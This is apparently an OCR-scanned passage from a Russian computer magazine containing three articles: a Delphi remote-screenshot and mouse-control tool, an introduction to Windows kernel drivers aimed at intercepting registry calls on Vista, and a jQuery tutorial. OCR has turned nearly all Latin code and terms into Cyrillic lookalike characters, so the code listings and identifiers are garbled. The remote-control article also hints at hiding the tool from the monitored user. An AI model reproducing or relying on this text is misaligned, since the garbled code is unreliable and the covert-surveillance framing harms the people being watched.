• ТИТСРСІіеп* * (закладка Іпбу Зегѵегз) — с по- 
мощью него ты будешь соединяться с сервером 
и посылать ему команды; 

•ТСгоирВохи в нем — дваТЕсІ'Н — вТЕбіі'ы 
ты в дальнейшем введешь ІР-адрес сервера 
и номер порта, по которому будет происходить 
соединение; 

• четыре ТВи^оп с текстом «Скриншот», 
«Просмотр», «Управление», «Сообщение 'ПОРА 
РАБОТАТЬ!'», назови кнопки В_0е1:5сг, В_ѴѴа1;сЬ, 
В_СопігоІ, В_Мез5аде соответственно. 

• ТСЬескВох с текстом «Полноэкранный 
режим»; 

• два ТТіте-г — один будет использоваться 




>Внешний вид формы 



для работы в режиме просмотра удаленного 
рабочего стола, а второй — для работы в режиме 
управления; у обоих компонентов свойство 
ЕпаЫесІ установи в Еаізе, а свойство Іпіегѵаі 
сделай равным 400 — это частота обновления 
картинки экрана сервера и посылки серверу 
команд, заданная в миллисекундах; 

• ТІтаде — в нем будет отображаться картинка с 
удаленного рабочего стола. 

Приступаем к работе. Для кнопки «Скриншот» 
создай следующий обработчик: 

ргосеЬиге ТРогтІ . В_ 

СеРЗсгСІіск (ЗепЬег : ТОЬзесД) ; 
ѵаг 

з : ТРіІеЗкгеат; 

Віктар: ТВіРтар; 

РЫС: ТРШСЭДесВ; 

Ьедіп 

//Подключаемся к серверу 

соппесВ_Ьо_зегѵег ; 

//Посылаем серверу команду 
«деВ_зсгееп» 

ІсЗТСРСІіепРІ ,№гі1:еЬп ( ' деВ_ 
зсгееп ' ) ; 

Ѵ7ІСИ ІсІТСРСІіепРІ СІО 

Ьедіп 

і I РіІеЕхізРз ( ' С : \з . рпд ' ) СНеп 
БеІеВеРіІе ( ' С : \з . рпд ' ) ; 

//Создаем поток 

з : = ТРіІеЗРгеаш. СгеаРе ( ' С : \ 



«ПРИНЦИП РАБОТЫ ЭТОЙ ПРОГРАММЫ МО- 
ЖЕТ БЫТЬ ПОЛОЖЕН В ОСНОВУ СЕРБ ИСОВ- 
СКРИНШУТЕРОВ, ПРИЗВАННЫХ НАЧАЛЬС- 
ТВОМ СЛЕДИТЬ ЗА СВОИМИ СОТРУДНИКАМИ. 
СТОИМОСТЬ ТАКИХ ПРОГРАММ ДОСТИГАЕТ 
СОТЕН ДОЛЛАРОВ» 
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> Внешний вид формы клиентской части 



з . рпд ' , ІтСгеаДе ) ; 

//Пока есть соединение, читаем данные 
ѵ/ііііе соппесДесі сіо 
КеасІЗОгеат (з , -1 , Дгие) ; 

//Уничтожаем поток 
РгееАпсШіІ (в); 

/ /Отключаемся 
БізсоппесД ; 

Ітадеі . РісБиге : =пі1 ; 

//Выводим полученный скриншот на экран 
РШ := ТРШОЬд есБ . СгеаРе ; 

ВіРтар : = ТВіРшар . СгеаВе; 

Вгу 

РШ . БоасіРготРіІе ( ' С : \з . рпд ' ) ; 

ВіВтар. Аззідп (РШ) ; 

Ітадеі . РісВиге . ВіВтар .Аззідп (ВіВтар) ; 

Віпаііу 

РШ.Ргее; 

ВіВтар . Ргее; 
епсі.; 

епсі; //епсі — ыіВП 
епсі; 



Как видишь, тут все элементарно. С помощью собственной 
процедуры соппесі_іо_вегѵег(ее реализациюты можешь 
найти в исходниках) мы подключаемся ксерверу. Для этого 
вызывается метод Соппесі компонента ТісІТСРСІіепВ и пред- 
варительно устанавливаются свойства Ноз! и Рогі. Затем с 
помощью процедуры ѴѴгі1:еІ_п мы отправляем серверу команду 
«деі_всгееп» и в ответ получаем графический файл формата 
РЫ6, который сохраняем на диске С и отображаем пользова- 
телю посредством компонента ТІтаде. 

Реализацию остальных функций ты найдешь в исходни- 
ках программы, а сейчас давай просто посмотрим, как она 
осуществлена. Если нажать на кнопку«Просмотр», еетекст 
поменяется на «Отключить просмотр», а кнопки «Скриншот» 
и «Управление» блокируются. Далее включается таймер, 
который через определенные промежутки времени (я уста- 
новил значение 400 мс) обращается ксерверу с просьбой 
прислать скриншот. Если пользователь нажимает на кнопку 
повторно, то режим просмотра отключается. Аналогично 



работаети режимуправления, только клиент, кромезапроса 
прислать скриншот, отправляетеще координаты курсора 
мыши (сообщения «тои5е_тоѵе», «тоіі5е_х» и «тоіі5е_у», 
полученные с помощью функции беЮигзогРоз), которые 
затем и устанавливаются у получателя. Если пользователь 
нажимает на кнопку «Сообщение 'Пора работать!'», на сер- 
вер уходит команда «теззаде_Іог_уои», которая приводит к 
вызову функции МеззадеВох и к выводу поверх всех откры- 
тых окон указанного текстового сообщения. 

Итак, программа разработана, пора испытывать ее в боевых 
условиях. Предупреждаю: если утебя стоит ЕігеѵѵаІІ, настрой его 
так, чтобы был возможен обмен сообщениями междудвумя ком- 
пьютерами сети по определенном порту (у меня выбран 6666). 



О Несколько слов напоследок 

Конечно, эта утилита не совершенна, но за совершенство 
обычно просят деньги :). Все втвоих руках — ты запросто 
можешь сделать из нее более серьезный продукт, реализо- 
вав дополнительные функции и возможности. Во-первых, 
наверняка, сразу бросается в глаза проблема мерцания при 
обновлении картинок. Ее можно решить, несколько изменив 
алгоритм работы получения скриншотов: для этого посылай 
не сами картинки, а лишь изменения между ними. 

Стоит отметить тот фа кт, что, если разрешения экранов мо- 
ниторов клиента и сервера различаются, может наблюдаться 
эффект отставания курсора мыши: когда на своем мониторе ты 
наводишь курсор на одно место, на скриншоте, присланном с 
удаленного компьютера, он отстает и располагается чуть выше. 
Решается эта проблема вводом специального коэффициента и 
применением его к координатам, передаваемым на сервер. 
Также можно реализовать функцию работы по паролю. Ауж 
про скрытие программы в трей и придание ей невидимости 
я и говорить не буду — это классика жанра. А вотуправле- 
ние компьютером посредством 100 — это действительно 
круто. Представь только! Тебе вообще не нужно вдаваться 
втонкости сетевыхтехнологий и протоколов передачи 
данных. Ты просто встраиваешь в свой сервер возмож- 
ность приема и отправки ІСО-сообщений и управляешь 
компьютером удаленно излюбойточки мира (благо в сети 
можно найти компоненты, помогающие реализовать это без 
особых хлопот, да и мы в одном из предыдущих выпусков 
писали про создание асечного бота). НС 



г \ 
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>На дискеты найдешь 
полные исходные 
коды программы, 
описанной в статье, 
а также компонент 
ТРЫбІтаде, предна- 
значенный для работы 
с графическими фай- 
лами формата РІ\І6. 
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Ядерный перехват. 

Часть первая 

ПЕРЕХВАТ ОБРАЩЕНИЙ К РЕЕСТРУ В ѴѴІЫ00ѴѴ5 ѴІ5ТА 

Новая ОС от Майкрософт постепенно начинает занимать свою нишу на рынке. Основ- 
ным аргументом М3 в пользу ѴѴнкЗоѵѵз Ѵізі:а является ее безопасность. Однако в погоне 
за этой безопасностью сотрудники мегакорпорации перекрыли кислород производите- 
лям антивирусов и файрволов. Случайно это было сделано или преднамеренно, судить 
не нам. А мы разберемся с тем, как жить при подобной несправедливости. 
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> Официальный отладчик режима ядра от М5 



Внутреннее устройство 

№ІМІ0Ж$: 



НЦгіи 



шіпйачк Зегѵег' 2003. 

МЛікіяжі ХР и Мпйаш ?009 



> Внутреннее устройство ѴѴіпсіоѵѵз 



се, наверное, знаютзамечательную 
утилиту от Марка Руссиновича 
под названием РедМоп. Эта тузла 
показывает, какой процесс к какому 
ключу реестра хочетобратиться. В ОС семейства 
І\ІТ это было реализовано с помощью драйве- 
ра, который перехватывал соответствующие 
системные сервисы. Подобнойтехнологией 
пользовались практически все антивирусы и 
персональные файрволы, нос выходом ѴѴіпсіоѵѵз 
Ѵізіа эту «дыру» (по мнению Майкрософт) 
прикрыли. Официальная причина — чтобы 
противостоять действию руткитов, однако еще 
до выхода релиза знаменитый РаісИОиагд (так 
называется технология защиты ядерного кода 
от патча) поломали раз десять. 

Разработчики серьезного ПО, естественно, не 
ста нут ломать эту «защиту», а воспользуются 
альтернативными способами. 

□ Инструментарий 

Итак, мы собрались писать драйвер, а для этого 
нам понадобятся некоторые дополнительные 
инструменты. Хочу сразу предупредить, что этот 
материал ориентирован на людей, которые до- 
статочно хорошо программируют на прикладном 
уровне, но ни разу не сталкивались с кодом для 
ядра. Поэтому, еслиты имеешь подобный опыт, 
можешь просто просмотреть текст, так как что-то 
новое в немты врядли найдешь. 

Первым делом нам понадобится компилятор. 
Стандартом здесь является пакет от М5 — ййК 
(Огіѵег Оеѵеіортепі КіЫ. В него входит много 
всего полезного, но, ксожалению, нет оболочки 
для редактирования кода, так что об этом надо 
тоже позаботиться. 



Когда мы начнем писать более-менее серьезные 
драйверы, нам понадобится отладчик режима ядра. 
Самыми известными являются 5оШСЕ и ѴѴіпйЬд. 
ЗоШСЕ хорош тем, что драйверы можно отлаживать 
прямо на своей машине, а вот для ѴѴІпйЬд нужен 
второй компьютер. Но отлаживать драй вер на 
своей машине — это то же самое, что самому делать 
операцию на собственном мозге. Так что советую 
использовать ѴѴІпйЬд в тандеме с виртуальной 
машиной. Еще нам пригодится ОЬдѴіеѵѵ — утилита 
отуже упомянутого здесь Руссиновича, которая 
позволяет просматривать отладочные сообщения 
отдрайвера в реальном времени без отладчика. 
Писатьдрайвер мы будем под Висту, поэтому, 
чтобы избежать лишних проблем, нужно найти 
последние версии всего упомянутого выше. 

□ Основа драйвера 

Теперь приступим непосредственно к програм- 
мированию. Написать минимальный драйвер, 
оказывается, очень просто. Надо всего лишь 
определить тело функции ОгіѵегЕпІтуО. Чтобы 
наш драйвер успешно загрузился и не вызвал 
при этом голубого экрана смерти (Взой), нужно 
написать следующие строки: 

КОД МИНИМАЛЬНОГО ДРАЙВЕРА 

ЕТЗТАТОЗ БгіѵегЕпСгу ( 

Ш РБКІѴЕК_ОВЦЕСТ рБгіѵегОЬ^ есС , 
Ш РШІСОБЕ_ЗТКШС рКедізБгуРаЮТ 

) 

{ 

БТЗТАТБЗ зСаСиз = ЗТАТБЗ_ 
БЕѴІСЕ_С(ЖР I ОТКАТ I (Ж_ЕККОК ; 
геСигп зСаСиз; 

} 



Если мы скомпилируем драйвер и попробуем 
его загрузить (о том, как это сделать, я расскажу 
чуть позже), он завершит свою работу и будет 
выгружен из памяти, поскольку мы вернули код 
ошибки. Если бы мы не сделали этого, драйвер 
висел бы в памяти бесконечно, таккакпокау 
нас нет функции ОгіѵегІМоасІ, ответственной за 
выгрузкудрайвера. 

Теперь надо разобраться с параметрами, 
передаваемыми в функцию, и их типа ми, так как 
некоторые уже могли заметить, что, например, 
РИ N I СО й Е_5ТР I N Ѳ никогда раньше не встре- 
чался в программировании для юзер-мода. 

Сама функция ОгіѵегЕпігу — это входная точка в 
модуль, именно этой функции передается управ- 
ление при загрузке драйвера. 

Первый параметр рОгіѵегО^есІ — это указатель 
на объекттолько что созданного драйвера. 
ѴѴіпсіоѵѵз является объектно-ориентированной 
системой; загружая драйвер, система создает 
объект «драйвер» (бгіѵегоЬіесі), представля- 
ющий для нее образ драйвера в памяти. Через 
этот объект система управляетдрайвером. На 
самом деле, это вовсе не объект в классическом 
понимании, а просто некая структура данных 
типа ОРІѴЕР_ОВЭЕСТ, определение которой можно 
посмотреть здесь: \іпсІибе\ѵѵ2к\пШк.іпс. Неко- 
торые поля этой структуры заполняет система, 
некоторые придется заполнять нам самим. Об- 
ращаясь кэтой структуре, система и управляет 
драйвером. 

Следующий параметр — это рПедізігуРаіЬ. Он 
является указателем на ипісосіе-строку, которая, 
в свою очередь, указывает на путь к разделу 
реестра, содержащему параметры инициали- 
зации драйвера. Структуру этого раздела, как 
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ПРОГРАММИРОВАНИЕ ДРАЙВЕРОВ 
И СИСТЕМ БЕЗОПАСНОСТИ 




> Программирование драйверов 
и систем безопасности 



и многое другое, мы рассматривать не будем, 
так как объем статьи (да и всего журнала) не 
может вместить всего, чего бы нам хотелось. 
Однако в конце статьи будут приведены ссылки 
и названия книг, которые надо прочитать, чтобы 
достаточно хорошо разбираться в программи- 
ровании режима ядра. 

Но вернемся к нашему параметру. Какуже 
можно было заметить, это не обычная строка, а 
структура, в которой содержится указатель на 
ипісобе-строку, содержащую имя раздела. Этот 
указатель драйвер может использовать для 
добавления в реестр какой-либо нужной в даль- 
нейшем информации. В этом случае необходимо 
сохранить путь к подразделу реестра, но не сам 
указатель, поскольку по выходу из процедуры 
ОгіѵегЕпігу он потеряет всякий смысл. Но обыч- 
но этого не требуется. 

О формате данных И N I СО О Е_БТР I N Ѳ следует 
сказать особо. В отличие от режима пользова- 
теля, режим ядра оперирует строками в формате 
0) N I С О О Е_5Т Р I N Ѳ . Эта структура определена 
в файле \іпсІисІе\ѵѵ2к\п1:сІеЕіпс следующим 
образом: 

имюооЕ_5ткше 

СуресбеГ зСгисС _ШІСОБЕ_ЗТКШ0 { 
БЗНОКТ ЬепдДЬ; 

БЗНОКТ МахішишЬепдЦЬ.; 

#іМеб МІББ_РАЗЗ 

[зІ 2 е_І 8 (МахітишЬепдЦЬ / 2) , 
1епдЫг_із ( (БепдЕЪ.) /2) ] 
БЗНОКТ * ВиІіЕег; 

#е1зе // МІББ_РАЗЗ 
РМЗТК Ви^ег; 



#епс!іР // МІБЬ_РАЗЗ 
} БЖООБЕ_ЗТКШ0; 

ЕуресІеР БШСОБЕ_ЗТКШ0 
*РБШООБЕ_ЗТКШ0; 

БуресіеТ сопзС БШООБЕ_ЗТКШ0 
* РСШІСОБЕ_ЗТКШ0 ; 

БепдШ — содержит текущую длину строки в 
байтах (не в символах!), не считая завершающего 
нуля. МахітитІ_епд{б — максимальный размер 
буфера (также в байтах), в котором эта строка 
содержится. В и^ег — указатель на саму ипісосіе- 
строку. Главное достоинство этого формата втом, 
что он явно определяет кактекущую длину строки, 
таки ее максимально возможную длину. При опе- 
рациях стакой строкой это позволяет обойтись 
без некоторых дополнительных вычислений. 

О Классификация драйверов 

Теперь немного отвлечемся от практики и 
погрузимся в теорию. Со времен ѴѴіпбоѵѵз 2000 
все драйверы устройств можно разделить на 
два основныхтипа: пользовательского режима 
(ІІзег Мобе Огіѵегв) и режима ядра (Кегпеі Мобе 
Огіѵегв). Драйверы ІІзег Мобе, в свою очередь, 
делятся на драйверы виртуальныхустройств 
(Ѵігіиаі йеѵісе Огіѵегз, ѴОО), использующиеся 
для поддержки программ М5-005, и драйверы 
принтеров (Ргіпіег Огіѵегв). Драйверы Кегпеі 
Мобе подразделяются на драйверы файло- 
вой системы (Еііе Эузіет Огіѵегв), которые 
реализуют ввод/вывод на локальные и сетевые 
диски, унаследованные драйверы (І_едасу 
Огіѵегв), написанные для предыдущих версий 
ѴѴіпбоѵѵз N1, драйверы видеоадаптеров (Ѵібео 



Огіѵегв), реализующие графические операции, 
драйверы потоковых устройств (Эігеатіпд 
Огіѵегв), реализующие ввод/вывод видео и 
звука, ѴѴОМ -драй веры (ѴѴіпбоѵѵз Огіѵег Мобеі, 
ѴѴОМ), поддерживающиетехнологии РІид’п’РІау 
иуправления электропитанием. 

Как следует из самого названия, драйвер 
устройства — это программа, предназначенная 
для управления каким-то устройством, причем 
устройство это не обязательно должно быть 
физическим. Оно можетбыть логическим или, 
как в нашем случае, виртуальным. 

Также драйверы можно разделить на одноуров- 
невые и многоуровневые. Большинство драйве- 
ров, управляющих физическими устройствами, 
является многоуровневыми (Іауегеб бгіѵегз). 
Обработка запроса ввода/вывода осуществля- 
ется несколькими дровами. Каждый выполняет 
свою часть работы. Например, запрос на чтение 
файла передается драйверу файловой системы, 
который, выполнив некоторые операции 
(например, разбиениезапроса на несколько 
частей), передает его «ниже» — драйверу диска, 
этот, в свою очередь, отправляет запрос драй- 
веру шины. Крометого, между ними можно до- 
бавить любое количество драйверов-фильтров 
(например, шифрующих данные). Выполнив за- 
прос, нижестоящий драйвер (Іоѵѵег-ІеѵеІ бгіѵег) 
передает его результаты наверх, вышестоящему 
(ЬідЬег-ІеѵеІбгіѵег). 

□Уровни запросов прерываний 

Прерывание — неотъемлемая частьлю- 
бой операционной системы. Онотребует 
обработки, поэтому выполнение текущего 
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кода прекращается и управление передается 
обработчику прерывания. Существуют как 
аппаратные, так и программные прерывания. 
Они обслуживаются в соответствии с их приори- 
тетом. ѴѴІпсІоѵѵв 2000 (каки Виста) использует 
схему приоритетов прерываний, известную под 
названием «уровни запросов прерываний» 
(іпіеггирі гедиезі Іеѵеіз, ІРСП_]. Всего существует 
32 уровня : с нулевого (раззіѵе) , имеющего самый 
низкий приоритет, по31-ый (ЫдЫ ссамым 
высоким приоритетом. Причем прерывания 
с 1ПСИ=0 (раззіѵе) по ІРСИ=2 (ОРС\бізраІсЫ 
являются программными, а с ІПСІІ_=3 (беѵісе 1 ) по 
I РО Ь=3 1 (ЫдЫ — аппаратными. Не путай уровни 
приоритета прерываний суровнями приорите- 
тов потоков — это разные вещи. Прерывание с 
уровнем 1ПСЫ=0, строго говоря, прерыванием 
не является, поскольку оно не может прервать 
работу никакого кода (ведь для этого код должен 
выполняться на еще более низком уровне пре- 
рывания, а такого уровня нет). На этом I РОС вы- 
полняются потоки пользовательского режима. 
Следует заметить, что на уровне прерыва- 
ния раззіѵе можно вызывать любые функ- 
ции ядра, а также обращаться к страницам 
памяти, сброшенным в файл подкачки. В 
ОйК в описании каждой функции обяза- 
тельно указано, на каком уровне прерыва- 
ния ее можно вызывать. На более высоких 
уровнях прерывания ШРС/бізраіЬ и выше) 
попытка обращения кстранице, отсутс- 
твующей в физической памяти, приводит 
к краху системы, так как диспетчер памяти 
(МегтюгуМападег) не может обработать 
ошибку страницы. 

□ Компиляция кода 

Теперь, когда мы немного разобрались с теори- 
ей, попробуем скомпилировать наш драйвер. 
Первым делом создадим файл таіп.с и напи- 
шем там следующие строки: 

СОДЕРЖАНИЕ ФАЙЛА МАШ.С 

#іпс1исІе <пСсІс1к.Ъ.> 

ЫТЗТАТБЗ БгіѵегЕпСгу ( 

Ш РБКІѴЕК_ОВЦЕСТ рБгіѵегОЪб есС , 
Ш РШІСОБЕ_ЗТКШС рКедізкгуРаСЪ. 

) 

{ 

ЫТЗТАТБЗ зСаСиз = ЗТАТБЗ_ 

БЕѴІ С Е_СОЫЕ I ОТЖАТ I (Ж_ЕШЮК ; 
геСигп зСаСиз; 

} 

Ничего нового, только добавился заголовочный 
файл, содержащий основные определения для 



программирования в режиме ядра. Рядом с 
таіп.с сохраним файл зоигсез со следующим 
содержанием: 

СОДЕРЖАНИЕ ФАЙЛА 501ІКСЕ5 

ТАРСЕТЕАМЕ=Ъазіс_с1гіѵег 

ТАКСЕТРАТН=оЬз 

ТАКСЕТТУРЕ=БКІѴЕК 

ЗОІШСЕЗ=таіп . с 

Этот файл определяет имя драйвера, файл с 
исходным кодом ит.д. И последнее, что нам надо, 
— это такеТІе. В нем будет всего одна строка: 
«!ІМСШВЕ$(МТМАКЕЕЫѴ)\такеТІе.сіеЬ. 

Теперь, если на машинеуже установлено 
ООК, заходим в соответствующий пункт 
главного меню системы, выбираем пункт Виіісі 
ЕпѵігоптепТз, затем ОС, под которую будем 
собирать драйвер, и кликаем, допустим, на 
ѴѴі псіоѵѵз ХР х86 СНескеб Виіісі ЕпѵігоптепТ. 
Помимо СЬескеб В и ііб ЕпѵігоптепТ, есть еще и 
Егее Виіісі ЕпѵігоптепТ. СЬескеб предназначе- 
на для тестовых сборок ѴѴІпбоѵѵз, а Егее — для 
релизов. Послетого как мы выбрали соответс- 
твующую оболочку, в командной строке пере- 
ходим в директорию, в которой мы сохранили 
исходный код нашего драйвера, и вбиваем 
команду Ьиііб. Если все в порядке, должна 
появиться папка, в которой будетлежать наш 
драйвер с расширением зуз. 

□ Загрузка драйвера 

Загрузитьдрайвер в систему, чтобы он работал, 
можно двумя способами: документированным 
и не очень. Документированный способ на 
удивление прост — загрузитьдрайвер можно 
при помощи диспетчера служб, то есть 5СМ-ме- 
неджера. Работа с драйвером сходна с работой 
со службой — вызываются одни и те же функции. 
Лишь передаваемые им параметры будут не- 
много отличаться отобычных. Заострять на этом 
внимание я не буду, так как статья уже подходит 
к концу, а еще надо рассказать, где про все это 
можно почитать более подробно. 

□ Дополнительная литература и ссылки 

Все сказанное выше настолько мало затраги- 
ваеттему написания драйверов, что человек, 
знакомый с процессом написания модулей для 
режима ядра, может возмутиться по поводу 
слабости изложенного материала. Но цель этой 
статьи вовсе не научить кодить в Кегпеі Мобе, 
а лишь ввести в данную тему, для того чтобы в 
следующем номере рассказать о более инте- 
ресных вещах. Адля этого надо хорошоусвоить 
принципы программирования в режимеядра. 



Итак, чтобы освоить этот вид программиро- 
вания, советую почитать следующие книги. В 
первую очередь, это «Внутреннее устройство 
МісгозоЛ ѴѴІпбоѵѵз 2000», написанная Дэвидом 
Соломоном и Марком Руссиновичем. Книга пос- 
тоянно обновляется, поэтому ее названиесейчас 
может немного отличаться. Хотя в этой книге нет 
ни одной строчки исходного кода, прежде всего 
она для программистов. «Недокументированные 
возможности ѴѴІпбоѵѵз 2000» Свена Шрайбера 
— сугубо практическая книга, в которой раскры- 
то множествотайн ѴѴІпбоѵѵз 2000. 

Из отечественных авторов могу посоветовать 
В.П. Солдатова с его трудом «Программиро- 
вание драйверов ѴѴІпбоѵѵз». Первая часть 
книги читается довольно живенько и несет 
в себе много полез ной информации. Для 
ленивых рекомендую «Программирование 
драйверов и систем безопасности» Соро- 
киной и Щербакова — чтиво представляет 
собой краткий «курс молодого бойца» в 
области ядерного программирования. Также 
неплохо иметь под рукой «Справочник по 
базовым функциям АРІ ѴѴІпбоѵѵз N1/2000» 
Гари Неббета. 

Теперь скажу немного об онлайн-ресурсах, 
которые могут пригодиться в этом нелегком 
деле. Во-первых, стоит отметить цикл статей 
«Драйверы режима ядра», который написал 
небезызвестный Еоиг-Е. Найти эти статьи 
можно на ЫірѴ/ѵѵазт.ги . На мой взгляд, это 
один из самых лучших русскоязычныхтрудов 
на тему программирования в режиме ядра. 
Исходный код примеров, правда, написан на 
ассемблере, но это не должно стать преградой 
для человека, желающего научиться кодить 
драйверы. 

Еще одним хорошим ресурсом потеме является 
ЫірѴ/озгопІІ пехот . Сайтанглоязычный, но 
люди, при разработке драйверов сталкивающи- 
еся с проблемой, которую не удается решить с 
помощью отечественных программистов, идут 
именно сюда. Местный форум — просто сокро- 
вищница знаний по Кегпеі-Мобе кодингу. 

□ Это все? 

Итак, как я уже говорил, эта статья ознакоми- 
тельная. Единственная ее цель — подготовить 
читателя к следующему материалу, в котором я 
затрону непосредственно проблемы перехвата 
обращений к реестру в ѴѴІпбоѵѵз Ѵізіа. Причем 
с помощью этого механизма можно нетолько 
узнать отом, что некое приложение зех.ехе 
пытается записаться в ключ автозагрузки в ре- 
естре, но и помешать ему сделать это прямо на 
уровне ядра. Такчто, как говорится, всемучить 
матчасть. ИИ 
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БОРИС ВОЛЬФСОН 



/ ВОВІ5ѴОІ_ГЗОЫ@СМАІІ_.СОМ / 




ВОЗМОЖНОСТИ МОГУЧЕГО ФРЕЙМВОРКА ЗСІІІЕРѴ ДЛЯ ВЕБ-ПРОГРАММИСТОВ 



Порой в процессе программирования у меня создается впечатление, чтсдС^иегу читает 
мои мысли — так мало кода приходится писать. При этом код не теряет ясности и на- 
глядности, а в простейших случаях напоминает С53. 



ОТочки над «і»? 

«Разве не программированием мы занима- 
лись в прошлой статье? — спросит внима- 
тельный читатель. — Ведь мы писали 
код на ЗаѵаЗсгірР.. неужели это не про- 
граммирование?» 

С технической точки зрения — да, с кон- 
цептуальной — нет. Ведь мы использовали 
ІОиегу для верстки, а под программиро- 
ванием стоит понимать более широкий 
фронт деятельности: от обработки событий 
до работы с формами. Та к что переходим к 
самому интересному — программированию 
на ЫѵаЗсгірі с использованием ІОиегу. Если 
для верстальщика этот фреймворк — рас- 
ширение С55, то программист на ЫѵаЗсгірІ 
рассматривает его как библиотеку доступа к 
произвольным элементам веб-страницы. 



О От верстки ккодингу 

Чтобы плавно перейти от верстки к програм- 
мированию, рассмотрим смежный пример 
— раскрывающееся вертикальное меню. Су- 
ществуют целые библиотеки, которые создают 
подобные меню, а мы управимся парой строчек 
на ЗаѵаЗсгірР Меню будет представлять собой 
многоуровневый СПИСОК: 

МНОГОУРОВНЕВОЕ МЕНЮ 
НТМІ_ 

<и1><1і> 

<с!іѵ Ыазз = " со11арзіЫе">Первый 
пункте /сІіѵ> 

<и1> 

<1і> 

<(3іѵ с1азз= " соІІарзіЫе" >Первый 
подпункта / с3.і ѵ> 



<и1><1і>Первый подпункта /1і> 
<1і>Второй подпункт</1і> 

<1і>Третий подпункта /1іх/и1> 

< / 1 і > 

</и1> 

</1іх/и1> 

Как видишь, я использовал слои с классом 
соІІарзіЫе, обозначающие «кнопки», при клике 
на которые меню свернется: 

СВОРАЧИВАНИЕ МЕНЮ 

МѴА5СРІРТ 

$ ( " . соІІарзіЫе" ) . сііск ( РипсРіоп ( ) 
{ 

$ ( Йііз) . рагепР ( ) . сММгеп ( ) . 

пор ( " . соІІарзіЫе" ) . Роддіе ( ) ; 

Ш 
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Здесь используется классический прием 
ІОиегу — цепочка вызовов. Первой в ней идет 
конструкция $({Ыз), обозначающая текущий 
элемент, на котором сработало событие — клик 
мышкой. РагепШ выбирает прямого родителя 
(в нашем случае тэг Іі. сЬЛбгепО) и, как неслож- 
но догадаться, служит для получения всех 
дочерних элементов. Из них нам надоубрать 
слой с классом соІІарзіЫе, что делает метод 
пок Теперь осталось вызвать іоддіе, который 
либо спрячет, либо покажет ветку меню, в за- 
висимости отее видимости (смотри рисунок). 

□ Свежие новости 

Возможно, этот код покажется тебе несколько 
усложненным, но зато мы легко сможем исполь- 
зовать его и при создании раскрывающихся 
новостей. Например, у нас есть за головки или 
краткий вариантсообщения; пользователь щел- 
кает по нему и получает открывшуюся новость 
(смотри рисунок). 

Стрелкой я показал, как именно новость будет 
открываться. Теперь напишем НТМЦ который 
будет похож на наше меню: 

ОПИСАНИЕ ОДНОЙ НОВОСТИ 

НТМІ_ 

«ііѵ с1азз= "соііарзіЫе"> 

Заголовок новости </сІіѵ> 

<с!іѵ> 

Текст новости 
</с!іѵ> 

</с!іѵ> 

іаѵаЗсгірі будеттем же самым, разве что я 
добавлю в него немного наворотов, которые 
сделают код более юзабельным. Применим 
анимацию «разворачивание», которая реа- 
лизуется методом зІісІеТоддІе с параметром 
5Іоѵѵ, чтобы действие происходило медленно. 
При загрузке страницы свернем все новости и 
припишем к за головку на три символа больше. 
На практике эти три символа лучше заменить 
ка ртинкой. 



СВОРАЧИВАНИЕ/РАЗВОРАЧИВАНИЕ 

НОВОСТЕЙ 

МѴА5СВІРТ 

$ ( " . соІІарзіЫе" ) . сііск ( іипскіоп ( ) 

{ 

$ (Ытіз) . рагепк ( ) . сЬіісігеп 
( ) . поО ( " . соІІарзіЫе" ) . 
ЗІісІеТоддІе ( " зіоЫ ) ; 

}) ? 

$ ( " . соІІарзіЫе" ) .рагепк ( ) . 

сітіісігеп ( ) . пок ( " . соІІарзіЫе" ) . 
Мсіе ( ) ; 

$ ( " . соІІарзіЫе" ) . аррепсі ( "<зта11> 
&дк ; &дк ; & дк ; </зта11>" ) ; 

□ Анимация 

«Что может быть бесполезней, чем всякая 
анимация на сайте?» — думал я в детстве. 

На первый взгляд подобные мысли кажутся 
логичными. Нотогда зачем в состав фрейм- 
ворка (каркаса) включили такой функционал? 
В нем должно бытьтолько самое нужное, все 
остальное надо вынести в плагины! Но если 
посмотреть на любой со в ременный динами- 
ческий сайт, особенно с применением идео- 
логии АІАХ, то станет понятно, что анимация 
может быть и полезна. Когда добавляется 
новое сообщение в чате или приходит новое 
письмо в почтовой системе, посетителю 
надо ясно указать на эти события. Почтовую 
систему мы писать не будем, а как работает 
метод апітаіе, посмотрим на более простом 
примере. 

При клике пользователя по кнопкеудалим 
все параграфы — содержимое тэгов р. Если 
вызывать метод Ыбе, то посетитель не поймет, 
что произошло («Бац, и все исчезло!»). Мы же 
плавно погасим текст, уменьшая (по правде 
говоря, увеличивая) его прозрачность (смотри 
соответствующий рисунок). 

Чтобы использовать метод апітаіе, ему надо 
передать два параметра. Первый — это массив 
изменяющихся свойств, второй — скорость 
изменения: 



АНИМАЦИЯ: ЗАТУХАНИЕ ТЕКСТА 

МѴА5СВІРТ 

$ ( " #Мсіе" ). сііск ( кипскіоп ( ) { 

$ ( "р" ) . апітаке ( { 

орасіку: 'Мсіе' }, 50 00); 

}) ; 

□ Тултипы 

В продолжение темы анимации рассмотрим 
два специализированных метода — зіісіе Ооѵѵп 
изіісіеіір — для сворачивания и разворачи- 
вания элементов соответственно. Именно при 
помощи этих эффектов и будут появляться 
наши всплывающие подсказки. Определим, 
что тултипом у нас будет элемент, который 
следуетза ссылкой и имеет класс Іооііір. 
Подсказка может содержать информацию о 
ресурсе, на который она ведет, что поможет 
посетителю принять решение отом, стоитли 
по ней переходить. Показывать мы ее будем 
при наведенном на ссылку курсоре (смотри 
рисунок). 

Чтобы обработать событие Ьоѵег, надо указать две 
функции, которые будут вызваны при входе курсо- 
ра мышки в область элемента и выходе из нее: 

ПОКАЗЫВАЕМ ТУЛТИП 

МѴА5СВІРТ 

$ ( " . кооікір " ) . ргеѵ ( " а" ) . Ьоѵег ( 
іщіекіоп ( ) { $ (кЬіз) . пехк ( " . 
кооікір" ) . зіісіеВоші ( ) ; } , 

кипскіоп () { $ (кЬіз) .пехк ( " . 
кооікір" ) . зіісіеіір ( ) ; } 

) ; 

Здесь мы использовали новые методы ргеѵ 
и пехі, которые возвращают предыдущий 
и последующий элементы соответственно. 
Последним будет примечание о необходимос- 
ти скрыть все тултипы при загрузке страницы. 
Если ты дочитал до этого момента, то знаешь, 
как это сделать. 

□ Классы 

Переходим кодной из фундаментальных 
возможностей в арсенале ІОиегу — к работе 
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с классами. Для манипуляций сними нам 
доступно три ОСНОВНЫХ функции: 

• асісІСІазз- добавляетуказанный классданно- 
му элементу; 

• гетоѵеСІазз -удаляетуказанный классу 
данного элемента; 

• ІоддІеСІазз - добавляет или удаляет класс в 
зависимости от наличия его у элемента. 

Давай сделаем более юзабельной кнопочку 
типа зиЬгттМ:, которая отправляетформу на 
